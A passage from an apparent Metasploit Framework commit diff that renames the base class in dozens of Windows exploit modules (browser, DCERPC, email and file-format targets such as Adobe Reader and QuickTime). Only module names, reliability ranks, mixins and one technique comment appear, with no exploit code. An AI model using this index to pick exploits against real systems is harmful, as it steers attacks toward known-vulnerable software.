b/modules/exploits/windows/browser/winamp_ultravox.rb index 3d2cc4191f..55dc7573cb 100644 --- a/modules/exploits/windows/browser/winamp_ultravox.rb +++ b/modules/exploits/windows/browser/winamp_ultravox.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/browser/windvd7_applicationtype.rb b/modules/exploits/windows/browser/windvd7_applicationtype.rb index 4d7d428b0a..d53d5caa3c 100644 --- a/modules/exploits/windows/browser/windvd7_applicationtype.rb +++ b/modules/exploits/windows/browser/windvd7_applicationtype.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/winzip_fileview.rb b/modules/exploits/windows/browser/winzip_fileview.rb index 725d4f1f67..733781eeb9 100644 --- a/modules/exploits/windows/browser/winzip_fileview.rb +++ b/modules/exploits/windows/browser/winzip_fileview.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb index 085e90f186..69975b84ce 100644 --- a/modules/exploits/windows/browser/wmi_admintools.rb +++ b/modules/exploits/windows/browser/wmi_admintools.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb index 7a0c664d80..eb12c2cf16 100644 --- a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb +++ b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/xmplay_asx.rb b/modules/exploits/windows/browser/xmplay_asx.rb index 4e53c13709..ebd19f155b 100644 --- a/modules/exploits/windows/browser/xmplay_asx.rb +++ b/modules/exploits/windows/browser/xmplay_asx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb index 6fdd49587e..964e85078a 100644 --- a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb +++ b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/yahoomessenger_server.rb b/modules/exploits/windows/browser/yahoomessenger_server.rb index 96d12e137b..d0c27f9a79 100644 --- a/modules/exploits/windows/browser/yahoomessenger_server.rb +++ b/modules/exploits/windows/browser/yahoomessenger_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb index ce4d676070..e23946a957 100644 --- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb +++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb index 6e66961670..b9c9da7626 100644 --- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb +++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb index c96e02efd9..94ddc31c7f 100644 --- a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb +++ b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb index 7c1644a853..5c2fe7dd4a 100644 --- a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb b/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb index 3a1fb0408b..85b998afba 100644 --- a/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb +++ b/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb index dd935ca56b..0aa1a5e6d2 100644 --- a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb index 6f5aa83335..f91b362c43 100644 --- a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb index 9f479be312..30c77f5b73 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking # This module acts as an HTTP server diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb index 609af5543f..645223a004 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking # This module acts as an HTTP server diff --git a/modules/exploits/windows/emc/alphastor_agent.rb b/modules/exploits/windows/emc/alphastor_agent.rb index 07697ef91d..a7e11d39b5 100644 --- a/modules/exploits/windows/emc/alphastor_agent.rb +++ b/modules/exploits/windows/emc/alphastor_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/emc/alphastor_device_manager_exec.rb b/modules/exploits/windows/emc/alphastor_device_manager_exec.rb index 1ac3b2d0fd..7a10b9e5db 100644 --- a/modules/exploits/windows/emc/alphastor_device_manager_exec.rb +++ b/modules/exploits/windows/emc/alphastor_device_manager_exec.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/emc/networker_format_string.rb b/modules/exploits/windows/emc/networker_format_string.rb index acbae74556..8f932b79a6 100644 --- a/modules/exploits/windows/emc/networker_format_string.rb +++ b/modules/exploits/windows/emc/networker_format_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/windows/emc/replication_manager_exec.rb b/modules/exploits/windows/emc/replication_manager_exec.rb index d053f2fdad..0f504efc1a 100644 --- a/modules/exploits/windows/emc/replication_manager_exec.rb +++ b/modules/exploits/windows/emc/replication_manager_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb b/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb index d356673194..8f1e0b300f 100644 --- a/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb +++ b/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/abbs_amp_lst.rb b/modules/exploits/windows/fileformat/abbs_amp_lst.rb index b5b5df41ca..778be2f254 100644 --- a/modules/exploits/windows/fileformat/abbs_amp_lst.rb +++ b/modules/exploits/windows/fileformat/abbs_amp_lst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb b/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb index d3ba10d458..93eb63e8f6 100644 --- a/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb +++ b/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/acdsee_xpm.rb b/modules/exploits/windows/fileformat/acdsee_xpm.rb index d0e2e16721..86a72a0669 100644 --- a/modules/exploits/windows/fileformat/acdsee_xpm.rb +++ b/modules/exploits/windows/fileformat/acdsee_xpm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/actfax_import_users_bof.rb b/modules/exploits/windows/fileformat/actfax_import_users_bof.rb index 81a9d67736..517398598e 100644 --- a/modules/exploits/windows/fileformat/actfax_import_users_bof.rb +++ b/modules/exploits/windows/fileformat/actfax_import_users_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/activepdf_webgrabber.rb b/modules/exploits/windows/fileformat/activepdf_webgrabber.rb index b53d2e1068..86bc6f656c 100644 --- a/modules/exploits/windows/fileformat/activepdf_webgrabber.rb +++ b/modules/exploits/windows/fileformat/activepdf_webgrabber.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb b/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb index 63bc9c8fcf..3644311a25 100644 --- a/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb +++ b/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb index 6af35d6482..b88ad8e02a 100644 --- a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb index 57d50e1f20..4a0687d996 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb index f1435ffe44..2f5ee29862 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb index e73645b2ee..697280e6f1 100644 --- a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb +++ b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_geticon.rb b/modules/exploits/windows/fileformat/adobe_geticon.rb index d67d68d24f..c2171452c4 100644 --- a/modules/exploits/windows/fileformat/adobe_geticon.rb +++ b/modules/exploits/windows/fileformat/adobe_geticon.rb @@ -7,7 +7,7 @@ require 'msf/core/exploit/pdf' require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb b/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb index 5e4d7de6d3..c731e1d16c 100644 --- a/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb +++ b/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb index f47602744f..9179308d2f 100644 --- a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb +++ b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_libtiff.rb b/modules/exploits/windows/fileformat/adobe_libtiff.rb index 2a1bd72bf5..b5f4de444f 100644 --- a/modules/exploits/windows/fileformat/adobe_libtiff.rb +++ b/modules/exploits/windows/fileformat/adobe_libtiff.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb index 3abbfeaee9..1c9c76bfb7 100644 --- a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb +++ b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb index 49bb5b8e07..a4c8a3f74a 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::PDF_Parse diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb index b5658a0430..9784381028 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb @@ -17,7 +17,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb index fd420091a1..a5e9289326 100644 --- a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb +++ b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_toolbutton.rb b/modules/exploits/windows/fileformat/adobe_toolbutton.rb index caa942dc5e..5c4bd3bdfd 100644 --- a/modules/exploits/windows/fileformat/adobe_toolbutton.rb +++ b/modules/exploits/windows/fileformat/adobe_toolbutton.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb index a64fa5f6ba..2d58380935 100644 --- a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb +++ b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_utilprintf.rb b/modules/exploits/windows/fileformat/adobe_utilprintf.rb index 03dda02143..9f7a3060b5 100644 --- a/modules/exploits/windows/fileformat/adobe_utilprintf.rb +++ b/modules/exploits/windows/fileformat/adobe_utilprintf.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb b/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb index 396176bf0d..e47e35a33b 100644 --- a/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb index 4d85c1fae8..d858b33316 100644 --- a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb +++ b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb index d807274f3f..dd69b138d1 100644 --- a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb +++ b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/aol_phobos_bof.rb b/modules/exploits/windows/fileformat/aol_phobos_bof.rb index 53c044328a..d8ecbe5739 100644 --- a/modules/exploits/windows/fileformat/aol_phobos_bof.rb +++ b/modules/exploits/windows/fileformat/aol_phobos_bof.rb @@ -29,7 +29,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb b/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb index ed6dd402c0..a12644c51b 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/apple_quicktime_texml.rb b/modules/exploits/windows/fileformat/apple_quicktime_texml.rb index e2ef03ffb9..fad009f7cb 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_texml.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_texml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/audio_coder_m3u.rb b/modules/exploits/windows/fileformat/audio_coder_m3u.rb index 677b09c960..26be3e5272 100644 --- a/modules/exploits/windows/fileformat/audio_coder_m3u.rb +++ b/modules/exploits/windows/fileformat/audio_coder_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/audio_wkstn_pls.rb b/modules/exploits/windows/fileformat/audio_wkstn_pls.rb index c59964b672..98b67355de 100644 --- a/modules/exploits/windows/fileformat/audio_wkstn_pls.rb +++ b/modules/exploits/windows/fileformat/audio_wkstn_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/audiotran_pls.rb b/modules/exploits/windows/fileformat/audiotran_pls.rb index 098c82121b..5ffed42488 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb index 2d824873e9..8b9aec6fa3 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb index cf3be4cdb6..c52224e5d9 100644 --- a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb +++ b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/bacnet_csv.rb b/modules/exploits/windows/fileformat/bacnet_csv.rb index dd284bb9b9..ab47486661 100644 --- a/modules/exploits/windows/fileformat/bacnet_csv.rb +++ b/modules/exploits/windows/fileformat/bacnet_csv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb b/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb index 9cce4f1ed1..d242391c9f 100644 --- a/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb +++ b/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/blazedvd_plf.rb b/modules/exploits/windows/fileformat/blazedvd_plf.rb index e8e7b6feb9..696949f650 100644 --- a/modules/exploits/windows/fileformat/blazedvd_plf.rb +++ b/modules/exploits/windows/fileformat/blazedvd_plf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb b/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb index eb1382c2c9..e3187673e7 100644 --- a/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb +++ b/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/bsplayer_m3u.rb b/modules/exploits/windows/fileformat/bsplayer_m3u.rb index ac074a89b7..db7439401e 100644 --- a/modules/exploits/windows/fileformat/bsplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/bsplayer_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ca_cab.rb b/modules/exploits/windows/fileformat/ca_cab.rb index a596d254fc..f7307bc680 100644 --- a/modules/exploits/windows/fileformat/ca_cab.rb +++ b/modules/exploits/windows/fileformat/ca_cab.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb index b9960e6c1d..f5b1d606db 100644 --- a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb +++ b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git 